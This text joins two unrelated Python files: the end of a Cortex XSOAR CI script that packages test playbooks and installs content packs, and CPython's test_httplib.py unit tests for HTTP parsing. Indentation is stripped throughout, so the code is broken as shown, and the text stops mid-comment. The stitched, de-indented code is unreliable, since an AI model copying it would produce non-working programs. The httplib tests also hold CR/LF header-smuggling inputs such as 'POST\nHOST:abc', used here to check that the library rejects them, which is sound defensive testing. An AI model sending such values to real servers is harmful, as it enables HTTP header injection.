def get_test_playbooks_in_dir(path):
playbooks = filter(lambda x: x.is_file(), os.scandir(path))
for playbook in playbooks:
yield playbook.path, playbook
def test_pack_metadata():
now = datetime.now().isoformat().split('.')[0]
now = f'{now}Z'
metadata = {
"name": "nightly test",
"id": str(uuid.uuid4()),
"description": "nightly test pack (all test playbooks and scripts).",
"created": now,
"updated": now,
"legacy": True,
"support": "Cortex XSOAR",
"supportDetails": {},
"author": "Cortex XSOAR",
"authorImage": "",
"certification": "certified",
"price": 0,
"serverMinVersion": "6.0.0",
"serverLicense": "",
"currentVersion": "1.0.0",
"general": [],
"tags": [],
"categories": [
"Forensics & Malware Analysis"
],
"contentItems": {},
"integrations": [],
"useCases": [],
"keywords": [],
"dependencies": {}
}
return json.dumps(metadata, indent=4)
def test_pack_zip(content_path, target):
with zipfile.ZipFile(f'{target}/test_pack.zip', 'w', zipfile.ZIP_DEFLATED) as zip_file:
zip_file.writestr('test_pack/metadata.json', test_pack_metadata())
for test_path, test in test_files(content_path):
if not test_path.endswith('.yml'):
continue
test = test.name
with open(test_path, 'r') as test_file:
if not (test.startswith('playbook-') or test.startswith('script-')):
test_type = find_type(_dict=yaml.safe_load(test_file), file_type='yml').value
test_file.seek(0)
test_target = f'test_pack/TestPlaybooks/{test_type}-{test}'
else:
test_target = f'test_pack/TestPlaybooks/{test}'
zip_file.writestr(test_target, test_file.read())
def get_non_added_packs_ids(build: Build):
"""
:param build: the build object
:return: all non added packs i.e. unchanged packs (dependencies) and modified packs
"""
    compare_against = 'origin/master{}'.format('~1' if build.branch_name == 'master' else '')
added_files = run_command(f'git diff --name-only --diff-filter=A '
f'{compare_against}..refs/heads/{build.branch_name} -- Packs/*/pack_metadata.json')
if os.getenv('CONTRIB_BRANCH'):
added_contrib_files = run_command(
'git status -uall --porcelain -- Packs/*/pack_metadata.json | grep "?? "').replace('?? ', '')
added_files = added_files if not added_contrib_files else '\n'.join([added_files, added_contrib_files])
added_files = filter(lambda x: x, added_files.split('\n'))
added_pack_ids = map(lambda x: x.split('/')[1], added_files)
return set(get_pack_ids_to_install()) - set(added_pack_ids)
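# Illustrative example (hypothetical diff output): if the added-files diff prints
#   Packs/MyNewPack/pack_metadata.json
# then 'MyNewPack' is considered an added pack and is removed from the set of pack
# IDs returned by get_pack_ids_to_install().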
def set_marketplace_url(servers, branch_name, ci_build_number):
url_suffix = quote_plus(f'{branch_name}/{ci_build_number}')
config_path = 'marketplace.bootstrap.bypass.url'
config = {config_path: f'https://storage.googleapis.com/marketplace-ci-build/content/builds/{url_suffix}'}
for server in servers:
server.add_server_configuration(config, 'failed to configure marketplace custom url ', True)
logging.success('Updated marketplace url and restarted servers')
logging.info('sleeping for 60 seconds')
sleep(60)
@run_with_proxy_configured
def test_integrations_post_update(build: Build, new_module_instances: list, modified_module_instances: list) -> tuple:
"""
    Runs 'test-module' on all integrations for the post-update check
Args:
build: A build object
new_module_instances: A list containing new integrations instances to run test-module on
modified_module_instances: A list containing old (existing) integrations instances to run test-module on
Returns:
        * A set of (instance name, integration name) tuples that succeeded the 'test-module' execution post update
        * A set of (instance name, integration name) tuples that failed the 'test-module' execution post update
"""
modified_module_instances.extend(new_module_instances)
successful_tests_post, failed_tests_post = instance_testing(build, modified_module_instances, pre_update=False)
return successful_tests_post, failed_tests_post
def update_content_on_servers(build: Build) -> bool:
"""
Updates content on the build's server according to the server version
Args:
build: Build object
Returns:
A boolean that indicates whether the content installation was successful.
        If the server version is lower than 6.0.0, the legacy content update is performed and True is returned.
        If the server version is 6.0.0 or higher (and this is not a nightly build), returns whether the packs
        installation was successful.
"""
installed_content_packs_successfully = True
if LooseVersion(build.server_numeric_version) < LooseVersion('6.0.0'):
update_content_till_v6(build)
elif not build.is_nightly:
set_marketplace_url(build.servers, build.branch_name, build.ci_build_number)
installed_content_packs_successfully = install_packs(build)
return installed_content_packs_successfully
@run_with_proxy_configured
def configure_and_test_integrations_pre_update(build: Build, new_integrations, modified_integrations) -> tuple:
"""
Configures integration instances that exist in the current version and for each integration runs 'test-module'.
Args:
build: Build object
new_integrations: A list containing new integrations names
modified_integrations: A list containing modified integrations names
Returns:
A tuple consists of:
* A list of modified module instances configured
* A list of new module instances configured
* A list of integrations that have failed the 'test-module' command execution
* A list of integrations that have succeeded the 'test-module' command execution
* A list of new integrations names
"""
tests_for_iteration = get_tests(build)
modified_module_instances, new_module_instances = configure_server_instances(build,
tests_for_iteration,
new_integrations,
modified_integrations)
successful_tests_pre, failed_tests_pre = instance_testing(build, modified_module_instances, pre_update=True)
return modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre
def install_packs_pre_update(build: Build) -> bool:
"""
Install packs on server according to server version
Args:
build: A build object
Returns:
A boolean that indicates whether the installation was successful or not
"""
installed_content_packs_successfully = False
if LooseVersion(build.server_numeric_version) >= LooseVersion('6.0.0'):
if build.is_nightly:
install_nightly_pack(build)
installed_content_packs_successfully = True
else:
if not build.is_private:
pack_ids = get_non_added_packs_ids(build)
installed_content_packs_successfully = install_packs(build, pack_ids=pack_ids)
else:
installed_content_packs_successfully = True
return installed_content_packs_successfully
def main():
install_logging('Install_Content_And_Configure_Integrations_On_Server.log', logger=logging)
build = Build(options_handler())
logging.info(f"Build Number: {build.ci_build_number}")
configure_servers_and_restart(build)
disable_instances(build)
install_packs_pre_update(build)
new_integrations, modified_integrations = get_changed_integrations(build)
pre_update_configuration_results = configure_and_test_integrations_pre_update(build,
new_integrations,
modified_integrations)
modified_module_instances, new_module_instances, failed_tests_pre, successful_tests_pre = pre_update_configuration_results
installed_content_packs_successfully = update_content_on_servers(build)
successful_tests_post, failed_tests_post = test_integrations_post_update(build,
new_module_instances,
modified_module_instances)
success = report_tests_status(failed_tests_pre, failed_tests_post, successful_tests_pre, successful_tests_post,
new_integrations, build)
if not success or not installed_content_packs_successfully:
sys.exit(2)
if __name__ == '__main__':
main()
|
test_httplib.py
|
import errno
from http import client
import io
import itertools
import os
import array
import re
import socket
import threading
import unittest
TestCase = unittest.TestCase
from test import support
here = os.path.dirname(__file__)
# Self-signed cert file for 'localhost'
CERT_localhost = os.path.join(here, 'keycert.pem')
# Self-signed cert file for 'fakehostname'
CERT_fakehostname = os.path.join(here, 'keycert2.pem')
# Self-signed cert file for self-signed.pythontest.net
CERT_selfsigned_pythontestdotnet = os.path.join(here, 'selfsigned_pythontestdotnet.pem')
# constants for testing chunked encoding
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'3\r\n'
'd! \r\n'
'8\r\n'
'and now \r\n'
'22\r\n'
'for something completely different\r\n'
)
chunked_expected = b'hello world! and now for something completely different'
chunk_extension = ";foo=bar"
last_chunk = "0\r\n"
last_chunk_extended = "0" + chunk_extension + "\r\n"
trailers = "X-Dummy: foo\r\nX-Dumm2: bar\r\n"
chunked_end = "\r\n"
HOST = support.HOST
class FakeSocket:
def __init__(self, text, fileclass=io.BytesIO, host=None, port=None):
if isinstance(text, str):
text = text.encode("ascii")
self.text = text
self.fileclass = fileclass
self.data = b''
self.sendall_calls = 0
self.file_closed = False
self.host = host
self.port = port
def sendall(self, data):
self.sendall_calls += 1
self.data += data
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
# keep the file around so we can check how much was read from it
self.file = self.fileclass(self.text)
        self.file.close = self.file_close  # nerf close()
return self.file
def file_close(self):
self.file_closed = True
def close(self):
pass
def setsockopt(self, level, optname, value):
pass
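# Minimal usage sketch (mirrors the pattern used throughout these tests): a canned
# response string is wrapped in a FakeSocket, handed to HTTPResponse, and parsed
# without any real network I/O, e.g.
#   sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n')
#   resp = client.HTTPResponse(sock)
#   resp.begin()   # resp.status == 200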
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise OSError(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFBytesIO(io.BytesIO):
"""Like BytesIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class FakeSocketHTTPConnection(client.HTTPConnection):
"""HTTPConnection subclass using FakeSocket; counts connect() calls"""
def __init__(self, *args):
self.connections = 0
super().__init__('example.com')
self.fake_socket_args = args
self._create_connection = self.create_connection
def connect(self):
"""Count the number of times connect() is invoked"""
self.connections += 1
return super().connect()
def create_connection(self, *pos, **kw):
return FakeSocket(*self.fake_socket_args)
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# Here, we're testing that methods expecting a body get a
# content-length set to zero if the body is empty (either None or '')
bodies = (None, '')
methods_with_body = ('PUT', 'POST', 'PATCH')
for method, body in itertools.product(methods_with_body, bodies):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', body)
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# For these methods, we make sure that content-length is not set when
# the body is None because it might cause unexpected behaviour on the
# server.
methods_without_body = (
'GET', 'CONNECT', 'DELETE', 'HEAD', 'OPTIONS', 'TRACE',
)
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', None)
self.assertEqual(
conn._buffer.content_length, None,
'Header Content-Length set for empty body on {}'.format(method)
)
# If the body is set to '', that's considered to be "present but
# empty" rather than "missing", so content length would be set, even
# for methods that don't expect a body.
for method in methods_without_body:
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', '')
self.assertEqual(
conn._buffer.content_length, b'0',
'Header Content-Length incorrect on {}'.format(method)
)
# If the body is set, make sure Content-Length is set.
for method in itertools.chain(methods_without_body, methods_with_body):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request(method, '/', ' ')
self.assertEqual(
conn._buffer.content_length, b'1',
'Header Content-Length incorrect on {}'.format(method)
)
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertIn(b'Content-length: 42', conn._buffer)
conn.putheader('Foo', ' bar ')
self.assertIn(b'Foo: bar ', conn._buffer)
conn.putheader('Bar', '\tbaz\t')
self.assertIn(b'Bar: \tbaz\t', conn._buffer)
conn.putheader('Authorization', 'Bearer mytoken')
self.assertIn(b'Authorization: Bearer mytoken', conn._buffer)
conn.putheader('IterHeader', 'IterA', 'IterB')
self.assertIn(b'IterHeader: IterA\r\n\tIterB', conn._buffer)
conn.putheader('LatinHeader', b'\xFF')
self.assertIn(b'LatinHeader: \xFF', conn._buffer)
conn.putheader('Utf8Header', b'\xc3\x80')
self.assertIn(b'Utf8Header: \xc3\x80', conn._buffer)
conn.putheader('C1-Control', b'next\x85line')
self.assertIn(b'C1-Control: next\x85line', conn._buffer)
conn.putheader('Embedded-Fold-Space', 'is\r\n allowed')
self.assertIn(b'Embedded-Fold-Space: is\r\n allowed', conn._buffer)
conn.putheader('Embedded-Fold-Tab', 'is\r\n\tallowed')
self.assertIn(b'Embedded-Fold-Tab: is\r\n\tallowed', conn._buffer)
conn.putheader('Key Space', 'value')
self.assertIn(b'Key Space: value', conn._buffer)
conn.putheader('KeySpace ', 'value')
self.assertIn(b'KeySpace : value', conn._buffer)
conn.putheader(b'Nonbreak\xa0Space', 'value')
self.assertIn(b'Nonbreak\xa0Space: value', conn._buffer)
conn.putheader(b'\xa0NonbreakSpace', 'value')
self.assertIn(b'\xa0NonbreakSpace: value', conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should be wrapped by [] if
# it is an IPv6 address
expected = b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
b'Accept-Encoding: identity\r\n\r\n'
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
def test_malformed_headers_coped_with(self):
# Issue 19996
body = "HTTP/1.1 200 OK\r\nFirst: val\r\n: nval\r\nSecond: val\r\n\r\n"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('First'), 'val')
self.assertEqual(resp.getheader('Second'), 'val')
def test_parse_all_octets(self):
# Ensure no valid header field octet breaks the parser
body = (
b'HTTP/1.1 200 OK\r\n'
b"!#$%&'*+-.^_`|~: value\r\n" # Special token characters
b'VCHAR: ' + bytes(range(0x21, 0x7E + 1)) + b'\r\n'
b'obs-text: ' + bytes(range(0x80, 0xFF + 1)) + b'\r\n'
b'obs-fold: text\r\n'
b' folded with space\r\n'
b'\tfolded with tab\r\n'
b'Content-Length: 0\r\n'
b'\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.getheader('Content-Length'), '0')
self.assertEqual(resp.msg['Content-Length'], '0')
self.assertEqual(resp.getheader("!#$%&'*+-.^_`|~"), 'value')
self.assertEqual(resp.msg["!#$%&'*+-.^_`|~"], 'value')
vchar = ''.join(map(chr, range(0x21, 0x7E + 1)))
self.assertEqual(resp.getheader('VCHAR'), vchar)
self.assertEqual(resp.msg['VCHAR'], vchar)
self.assertIsNotNone(resp.getheader('obs-text'))
self.assertIn('obs-text', resp.msg)
for folded in (resp.getheader('obs-fold'), resp.msg['obs-fold']):
self.assertTrue(folded.startswith('text'))
self.assertIn(' folded with space', folded)
self.assertTrue(folded.endswith('folded with tab'))
def test_invalid_headers(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('')
conn.putrequest('GET', '/')
# http://tools.ietf.org/html/rfc7230#section-3.2.4, whitespace is no
# longer allowed in header names
cases = (
(b'Invalid\r\nName', b'ValidValue'),
(b'Invalid\rName', b'ValidValue'),
(b'Invalid\nName', b'ValidValue'),
(b'\r\nInvalidName', b'ValidValue'),
(b'\rInvalidName', b'ValidValue'),
(b'\nInvalidName', b'ValidValue'),
(b' InvalidName', b'ValidValue'),
(b'\tInvalidName', b'ValidValue'),
(b'Invalid:Name', b'ValidValue'),
(b':InvalidName', b'ValidValue'),
(b'ValidName', b'Invalid\r\nValue'),
(b'ValidName', b'Invalid\rValue'),
(b'ValidName', b'Invalid\nValue'),
(b'ValidName', b'InvalidValue\r\n'),
(b'ValidName', b'InvalidValue\r'),
(b'ValidName', b'InvalidValue\n'),
)
for name, value in cases:
with self.subTest((name, value)):
with self.assertRaisesRegex(ValueError, 'Invalid header'):
conn.putheader(name, value)
def test_headers_debuglevel(self):
body = (
b'HTTP/1.1 200 OK\r\n'
b'First: val\r\n'
b'Second: val1\r\n'
b'Second: val2\r\n'
)
sock = FakeSocket(body)
resp = client.HTTPResponse(sock, debuglevel=1)
with support.captured_stdout() as output:
resp.begin()
lines = output.getvalue().splitlines()
self.assertEqual(lines[0], "reply: 'HTTP/1.1 200 OK\\r\\n'")
self.assertEqual(lines[1], "header: First: val")
self.assertEqual(lines[2], "header: Second: val1")
self.assertEqual(lines[3], "header: Second: val2")
class HttpMethodTests(TestCase):
def test_invalid_method_names(self):
methods = (
'GET\r',
'POST\n',
'PUT\n\r',
'POST\nValue',
'POST\nHOST:abc',
'GET\nrHost:abc\n',
'POST\rRemainder:\r',
'GET\rHOST:\n',
'\nPUT'
)
for method in methods:
with self.assertRaisesRegex(
ValueError, "method can't contain control characters"):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.request(method=method, url="/")
class TransferEncodingTest(TestCase):
expected_body = b"It's just a flesh wound"
def test_endheaders_chunked(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.putrequest('POST', '/')
conn.endheaders(self._make_body(), encode_chunked=True)
_, _, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
def test_explicit_headers(self):
# explicit chunked
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
# this shouldn't actually be automatically chunk-encoded because the
# calling code has explicitly stated that it's taking care of it
conn.request(
'POST', '/', self._make_body(), {'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# explicit chunked, string body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self.expected_body.decode('latin-1'),
{'Transfer-Encoding': 'chunked'})
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers.keys()])
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertEqual(body, self.expected_body)
# User-specified TE, but request() does the chunk encoding
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/',
headers={'Transfer-Encoding': 'gzip, chunked'},
encode_chunked=True,
body=self._make_body())
_, headers, body = self._parse_request(conn.sock.data)
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(headers['Transfer-Encoding'], 'gzip, chunked')
self.assertEqual(self._parse_chunked(body), self.expected_body)
def test_request(self):
for empty_lines in (False, True,):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request(
'POST', '/', self._make_body(empty_lines=empty_lines))
_, headers, body = self._parse_request(conn.sock.data)
body = self._parse_chunked(body)
self.assertEqual(body, self.expected_body)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
# Content-Length and Transfer-Encoding SHOULD not be sent in the
# same request
self.assertNotIn('content-length', [k.lower() for k in headers])
def test_empty_body(self):
# Zero-length iterable should be treated like any other iterable
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(b'')
conn.request('POST', '/', ())
_, headers, body = self._parse_request(conn.sock.data)
self.assertEqual(headers['Transfer-Encoding'], 'chunked')
self.assertNotIn('content-length', [k.lower() for k in headers])
self.assertEqual(body, b"0\r\n\r\n")
def _make_body(self, empty_lines=False):
lines = self.expected_body.split(b' ')
for idx, line in enumerate(lines):
# for testing handling of empty lines
if empty_lines and idx % 2:
yield b''
if idx < len(lines) - 1:
yield line + b' '
else:
yield line
def _parse_request(self, data):
lines = data.split(b'\r\n')
request = lines[0]
headers = {}
n = 1
while n < len(lines) and len(lines[n]) > 0:
key, val = lines[n].split(b':')
key = key.decode('latin-1').strip()
headers[key] = val.decode('latin-1').strip()
n += 1
return request, headers, b'\r\n'.join(lines[n + 1:])
def _parse_chunked(self, data):
body = []
trailers = {}
n = 0
lines = data.split(b'\r\n')
# parse body
while True:
size, chunk = lines[n:n+2]
size = int(size, 16)
if size == 0:
n += 1
break
self.assertEqual(size, len(chunk))
body.append(chunk)
n += 2
# we /should/ hit the end chunk, but check against the size of
# lines so we're not stuck in an infinite loop should we get
# malformed data
if n > len(lines):
break
return b''.join(body)
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(0), b'') # Issue #20007
self.assertFalse(resp.isclosed())
self.assertFalse(resp.closed)
self.assertEqual(resp.read(), b"Text")
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("''")''')
def test_partial_reads(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_mixed_reads(self):
# readline() should update the remaining length, so that read() knows
# how much data is left and does not raise IncompleteRead
body = "HTTP/1.1 200 Ok\r\nContent-Length: 13\r\n\r\nText\r\nAnother"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.readline(), b'Text\r\n')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(), b'Another')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos(self):
# if we have Content-Length, HTTPResponse knows when to close itself,
# the same behaviour as when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_reads_no_content_length(self):
# when no Content-Length is present, the socket should be gracefully closed
# once all data has been read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_partial_readintos_no_content_length(self):
# when no Content-Length is present, the socket should be gracefully closed
# once all data has been read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_readintos_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
b = bytearray(2)
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'Te')
self.assertFalse(resp.isclosed())
n = resp.readinto(b)
self.assertEqual(n, 2)
self.assertEqual(bytes(b), b'xt')
n = resp.readinto(b)
self.assertEqual(n, 0)
self.assertTrue(resp.isclosed())
self.assertFalse(resp.closed)
resp.close()
self.assertTrue(resp.closed)
def test_host_port(self):
# Check invalid host_port
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000",
"fe80::207:e9ff:fe9b", 8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80),
("[fe80::207:e9ff:fe9b]:", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE"; '
'Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read():
self.fail("Did not expect response from HEAD request")
def test_readinto_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFBytesIO)
resp = client.HTTPResponse(sock, method="HEAD")
resp.begin()
b = bytearray(5)
if resp.readinto(b) != 0:
self.fail("Did not expect response from HEAD request")
self.assertEqual(bytes(b), b'\x00'*5)
def test_too_many_headers(self):
headers = '\r\n'.join('Header%d: foo' % i
for i in range(client._MAXHEADERS + 1)) + '\r\n'
text = ('HTTP/1.1 200 OK\r\n' + headers)
s = FakeSocket(text)
r = client.HTTPResponse(s)
self.assertRaisesRegex(client.HTTPException,
r"got more than \d+ headers", r.begin)
def test_send_file(self):
expected = (b'GET /foo HTTP/1.1\r\nHost: example.com\r\n'
b'Accept-Encoding: identity\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n')
with open(__file__, 'rb') as body:
conn = client.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected), '%r != %r' %
(sock.data[:len(expected)], expected))
def test_send(self):
expected = b'this is a test this is only a test'
conn = client.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(array.array('b', expected))
self.assertEqual(expected, sock.data)
sock.data = b''
conn.send(io.BytesIO(expected))
self.assertEqual(expected, sock.data)
def test_send_updating_file(self):
def data():
yield 'data'
yield None
yield 'data_two'
class UpdatingFile(io.TextIOBase):
mode = 'r'
d = data()
def read(self, blocksize=-1):
return next(self.d)
expected = b'data'
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.send(UpdatingFile())
self.assertEqual(sock.data, expected)
def test_send_iter(self):
expected = b'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
b'Accept-Encoding: identity\r\nContent-Length: 11\r\n' \
b'\r\nonetwothree'
def body():
yield b"one"
yield b"two"
yield b"three"
conn = client.HTTPConnection('example.com')
sock = FakeSocket("")
conn.sock = sock
conn.request('GET', '/foo', body(), {'Content-Length': '11'})
self.assertEqual(sock.data, expected)
def test_blocksize_request(self):
"""Check that request() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.request("PUT", "/", io.BytesIO(expected), {"Content-Length": "9"})
self.assertEqual(sock.sendall_calls, 3)
body = sock.data.split(b"\r\n\r\n", 1)[1]
self.assertEqual(body, expected)
def test_blocksize_send(self):
"""Check that send() respects the configured block size."""
blocksize = 8 # For easy debugging.
conn = client.HTTPConnection('example.com', blocksize=blocksize)
sock = FakeSocket(None)
conn.sock = sock
expected = b"a" * blocksize + b"b"
conn.send(io.BytesIO(expected))
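# Two sendall() calls are expected: the 9-byte body is split by blocksize
# into an 8-byte block and a 1-byte remainder (no request headers here).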
